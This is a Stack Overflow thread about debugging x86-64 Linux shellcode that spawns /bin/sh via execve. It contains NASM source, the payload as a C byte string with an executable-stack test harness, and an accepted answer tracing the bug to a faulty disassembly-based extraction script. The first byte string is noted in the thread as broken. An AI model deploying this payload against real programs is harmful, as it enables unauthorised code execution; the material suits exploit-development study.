JMP unexpected behavior in Shellcode when next(skipped) instruction is a variable definition

Question

Purpose: I was trying to take advantage of the RIP mode in x86-64. Even though the assembly performs as expected on its own, the shellcode does not.

The Problem: Concisely what I tried was this,

jmp l1
str1: db "some string"
l1:
   other code
   lea rax, [rel str1]

I used the above at various places, it failed only at certain places and succeeded in other places. I tried to play around and could not find any pattern when it fails. When variable(str1: db instruction) position is after the instruction accessing it, it never failed(in my observations). However, I want to remove nulls, hence I placed the variable definition before accessing it.

Debug finds
On debugging , I found the failed jmp point to some incorrect instruction address. Eg:(in gdb)

(code + 18) jmp [code +27] //jmp pointing incorrectly to in-between 2
(code + 22) ... (this part has label)
(code + 24) some instruction // this is where I intended the jmp
(code + 28) some other instruction

Code This is a sample code, I was trying to spawn a Execve Shell. It is quite large so I have identified the position of the culprit JMP.

global _start
section .text
_start: 
    xor rax,rax
    mov rsi,rax
    mov rdi,rsi
    mov rdx,rdi
    mov r8,rdx
    mov rcx,r8
    mov rbx,rcx
    jmp gg //failing (jumping somewhere unintended)
    p2: db "/bin/sh"        
gg:
    xor rax,rax
    lea rdi, [rel p2]
    mov [rdi+7], byte al //null terminating using 0x00 from rax
    mov [rdi+8], rdi
    mov [rdi+16],rax


    lea rsi,[rdi+8]
    lea rdx,[rdi+16]
    mov al,59
    syscall

EDIT:1 Have modified the code to contain the failing instructions

EDIT:2 Shellcode in C that I used.

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x48\x31\xc0\x48\x89\xc6\x48\x89\xf7\x48\x89\xfa\x49\x89\xd0\x4c\x89\xc1\x48\x89\xcb\xeb\x07\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\x48\x31\xc0\x48\x8d\x3d\xef\xff\xff\xff\x88\x47\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x8d\x77\x08\x48\x8d\x57\x10\xb0\x3b\x0f\x05";
main()
{

    printf("Shellcode Length:  %d\n", (int)strlen(code));

    int (*ret)() = (int(*)())code;

    ret();

}

EDIT 3 I would get Hexdump by placing the following code would be placed inside a Bash file and running it by passing filename as argument. Took it from ShellStorm.

`for i in $(objdump -d $1 -M intel |grep "^ " |cut -f2); do echo -n '\x'$i`;

What does the raw machine code look like in a case where it fails? Did just the `jmp rel8` displacement change, or did other bytes change, too? (Use a debugger to examine memory in a live process and edit your question to make this a [mcve].) — Peter Cordes, Dec 23 '17 at 06:43
Also, note that `"/bin/sh"` needs to be zero-terminated for `execve`. This usually means you need to put it last, or you need to modify it at runtime to change a byte after it to a zero. If you have multiple strings, I don't think it gains you anything to jump over each one separately unless you're using the `call` trick to push their address; just group them together into one block. I think in your long sample code, some of them are explicit-length, but I didn't try to read your uncommented code to see how it works. — Peter Cordes, Dec 23 '17 at 06:48
@PeterCordes He modifies the string and adds a nul terminator and other data programmatically later on — Michael Petch, Dec 23 '17 at 08:44
The update to simplify the code makes that much easier to see. That's very close to self-modifying code, but I the `[rdi+8]` and `[rdi+16]` stores do avoid modifying any instructions that haven't executed yet. Note that after they execute, the instructions you see with a debugger's disassembly view will be different. It will cause modern CPUs to do a pipeline flush (self-modifying code machine nuke), but performance of this code is unimportant. — Peter Cordes, Dec 23 '17 at 15:53
Anyway, @yuvral you're still saying this code works as a stand-alone executable, but not when used as an exploit payload? Are you sure the target executable isn't modifying stack memory before returning into your machine code? Your code is position-independent, and there's no reason why a `jmp` like that would be any more sensitive to failure than anything else. Or are you looking at disassembly after the stores have already modified the jump target, or is your disassembly getting out of sync because of the non-instruction data? Is the `jmp` still encoded as `eb 07`? — Peter Cordes, Dec 23 '17 at 15:55
@PeterCordes , Jump instruction seems to be at the place it is supposed to be as per gdb, the only catch is it is pointing to a location where it is not supposed to. This depends on what is placed after JMP (str: db) and the direction of the JMP. The location where it is supposed to and where it is pointing differ by a minor offset. Eg: The required position would be code +121 but it is instead calling jmp to code + 127. I can provide the full debug output or the code if you require further insight. — Yuvraj Singh, Dec 27 '17 at 15:23
@YuvrajSingh Have you confirmed that you have properly encoided the exploit payload. Once it is in the target exectutable have you verified it matches the instructions byte for byte? Almost wondering if you've encoded it improperly and once loaded in the target it doesn't run as expected. — Michael Petch, Dec 29 '17 at 07:19
Apologies for the late followup guys, and thanks for the effort put in. Did an uname -a on my Ubuntu 12 machine, this is what I got. `Linux ubuntu 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux` I assembled as:- `nasm -felf64 -o execShell.o execShell.asm ld -o execShell.s execShell.asm -N` -N added in the assembly state to help rewrite the memory shellcode in C (Added in EDIT 2:) Compiled using gcc -fno-stack-protector -z execstack -o relExec.o relExec.c The above gives segmentation fault (relExec.o) when executed — Yuvraj Singh, Jan 04 '18 at 10:20
If you want to fix the shellcode you will find this in the string `\x48\x31\x48\x31` . It should be just `\x48\x31` . If you fix that things should be fine, but ultimately I believe the extra bytes being duplicated after the data occurred because of the method you used to take your standalone executable and generate the shell string.My guess is you used the output of some disassembly program (objdump? something else?) parsed the bytes and massaged them into a string. — Michael Petch, Jan 05 '18 at 06:42
@MichaelPetch. I took this code from ShellStorm, I did not spend much time investigating how it works, as it did not stump me before in simpler programs. I have pasted the code that I am using for dumping the hex under EDIT 3. Also, thanks for putting forth your way of creating the executable, I am going to follow the same in future. — Yuvraj Singh, Jan 05 '18 at 07:42
Problem is whatever method shellStorm is using is incorrect. Its using a method that uses data (IMHO disassembly output) that may under certain circumstances duplicate bytes during the process of jmp synchronization. This is a side effect of mixing code and data. ShellStorm may assume you always have data after the code for the output to be accurate. Effectively the process of disassembling was being too smart for what you need. — Michael Petch, Jan 05 '18 at 07:46

Michael Petch · Accepted Answer · 2018-01-05T08:24:00.530

TL;DR : The method you are using to convert your standalone shell code program shellExec to a shell code exploit string is buggy.

Based on the information given, I suspect the problem is the way in which you are using disassembly output to generate the final byte stream that gets converted into your shell code string. Likely the disassembly output had confusing output and possibly duplicated values. While trying to disassemble data (mixed with the code) it tried to output the shortest encodeable instruction to finish consuming all the data and then discovered you had a JMP target and duplicated some of the bytes as it backed up to re-synchronize. Whatever process was used to convert the disassembly to binary didn't take this kind of issue into account.

Don't use disassembly output to generate the binary file. Generate your standalone executable with the shell code (I believe shellExec is the file in your case) and use tools like OBJCOPY and HEXDUMP to generate the C shell code string:

objcopy -j.text -O binary execShell execShell.bin
hexdump -v -e '"\\""x" 1/1 "%02x" ""' execShell.bin

The objcopy command takes the execShell executable and extracts just the .text section (using the -j.text option) and outputs as binary data to the file execShell.bin. The hexdump command just reformats the binary file and outputs it in a form that can be used in a C string. This process doesn't involve parsing any confusing disassembly output so doesn't suffer the problem you encountered. The output of hexdump should look like:

\x48\x31\xc0\x48\x89\xc6\x48\x89\xf7\x48\x89\xfa\x49\x89\xd0\x4c\x89\xc1\x48\x89\xcb\xeb\x07\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\xc0\x48\x8d\x3d\xef\xff\xff\xff\x88\x47\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x8d\x77\x08\x48\x8d\x57\x10\xb0\x3b\x0f\x05

This differs slightly from yours which was:

\x48\x31\xc0\x48\x89\xc6\x48\x89\xf7\x48\x89\xfa\x49\x89\xd0\x4c\x89\xc1\x48\x89\xcb\xeb\x07\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\x48\x31\xc0\x48\x8d\x3d\xef\xff\xff\xff\x88\x47\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x8d\x77\x08\x48\x8d\x57\x10\xb0\x3b\x0f\x05

I've highlighted the difference. After the string of bytes /bin/sh your output introduced an extra \x48\x31 . The extra 2 bytes in your shell code string are responsible for the code not running as expected in the target executable.

Or build with `nasm -f bin` in the first place, so you don't need `objcopy`. (But then you need a `BITS` directive, or an option to set the target mode to 64-bit). — Peter Cordes, Jan 05 '18 at 09:59

Alexis Wilke · Answer 2 · 2017-12-29T05:54:47.090

I could compile your code with nasm after changing the // with ;, I did not try to execute it, though.

nasm -f elf64 a.s -o a

Then I could look at the code with:

objdump -d a

And the part of the code you are asking about looks like (i.e. the jmp)

  12:   48 89 cb                mov    %rcx,%rbx
  15:   eb 07                   jmp    1e <gg>

0000000000000017 <p2>:
  17:   2f                      (bad)  
  18:   62                      (bad)  
  19:   69                      .byte 0x69
  1a:   6e                      outsb  %ds:(%rsi),(%dx)
  1b:   2f                      (bad)  
  1c:   73 68                   jae    86 <gg+0x68>

000000000000001e <gg>:
  1e:   48 31 c0                xor    %rax,%rax

However, the following has a few problems:

    mov [rdi+7], byte al ;null terminating using 0x00 from rax
    mov [rdi+8], rdi
    mov [rdi+16],rax

You are attempting to do a WRITE to READ-ONLY memory. Code can't be modified
The mov rdi/rax may not be aligned
If that code were to succeed, it would overwrite your code at gg:.

Also, it would be a good idea to put a by alignment just before gg: Something like this:

p2: "..."
align   16
gg:
   xor rax,rax

And so since the code is read only, you have to put the zeroes in there by hand.

p2: db "..."
    db 0
    db 0, 0, 0, 0, 0, 0, 0, 0
    db 0, 0, 0, 0, 0, 0, 0, 0

If you know it is aligned, dq will work too.

Note, however, that you do not align p2 either so you cannot be sure (i.e. if your code changes the alignment is very likely to change too.) You would probably want to do:

    align 16
p2: db "..."
    db 0
    dq 0
    dq 0

A final note, the [rel p2] was quite limited. The relative offset in those instructions were limited to -127 and +128 as far as I know. On my 64 bit processor, though, it uses a 32 bits offset. You may have been running in such a problem, depending on your assembler, where it decided that it was too far. In your case, one solution is to put the lea instruction before the jmp over the data. And I would imagine that the compiler should generate an error if the offset overflows. Another possibility would be that somehow something gets optimized and the jmp doesn't get updated properly.

As a side note, the following is not well optimized:

    xor rax,rax
    mov rsi,rax
    mov rdi,rsi
    mov rdx,rdi
    mov r8,rdx

Using the xor for all the registers or reusing rax each time instead of switching would work better (more likely to work in parallel). Right now you tie all the instructions to the previous one (i.e. before you can copy rsi in rdi, you need to copy rax to rsi. Having mov rdi,rax would remove that dependency.) I think that you would not see any difference in this case, but that's something to keep in mind for good optimization.

With the alignments and adding the zeroes in the code, I get:

0000000000000000 <_start>:
   0:   48 31 c0                xor    %rax,%rax
   3:   48 89 c6                mov    %rax,%rsi
   6:   48 89 f7                mov    %rsi,%rdi
   9:   48 89 fa                mov    %rdi,%rdx
   c:   49 89 d0                mov    %rdx,%r8
   f:   4c 89 c1                mov    %r8,%rcx
  12:   48 89 cb                mov    %rcx,%rbx
  15:   eb 29                   jmp    40 <gg>
  17:   90                      nop
  18:   90                      nop
  19:   90                      nop
  1a:   90                      nop
  1b:   90                      nop
  1c:   90                      nop
  1d:   90                      nop
  1e:   90                      nop
  1f:   90                      nop

0000000000000020 <p2>:
  20:   2f                      (bad)  
  21:   62                      (bad)  
  22:   69 6e 2f 73 68 00 00    imul   $0x6873,0x2f(%rsi),%ebp
        ...
  35:   00 00                   add    %al,(%rax)
  37:   00 90 90 90 90 90       add    %dl,-0x6f6f6f70(%rax)
  3d:   90                      nop
  3e:   90                      nop
  3f:   90                      nop

0000000000000040 <gg>:
  40:   48 31 c0                xor    %rax,%rax
  43:   48 8d 3d d6 ff ff ff    lea    -0x2a(%rip),%rdi        # 20 <p2>
  4a:   48 8d 77 08             lea    0x8(%rdi),%rsi
  4e:   48 8d 57 10             lea    0x10(%rdi),%rdx
  52:   b0 3b                   mov    $0x3b,%al
  54:   0f 05                   syscall

Note that when disassembling, if your data represents an instruction it may end up using bytes from your valid code and thus not show you what you would otherwise expect. i.e. it can end up not finding the destination label. Here we're good, though.

He's having problem when this code is run as shell code (not standalone). In shell code this code will be placed on the stack. He would need to concern himself that the stack is marked executable in the target executable. He is overwriting code after it has been executed so that he can avoid placing 0x00 (NUL)bytes in the generated shell code. Unless he's in an OS (not the default for Linux) that forces alignment in userland such unaligned access here should work. — Michael Petch, Dec 29 '17 at 05:46
Ah. The clearing of 17 bytes in code saves him 6 bytes total... may be a good idea for a hacker. — Alexis Wilke, Dec 29 '17 at 05:58

JMP unexpected behavior in Shellcode when next(skipped) instruction is a variable definition

2 Answers2

Linked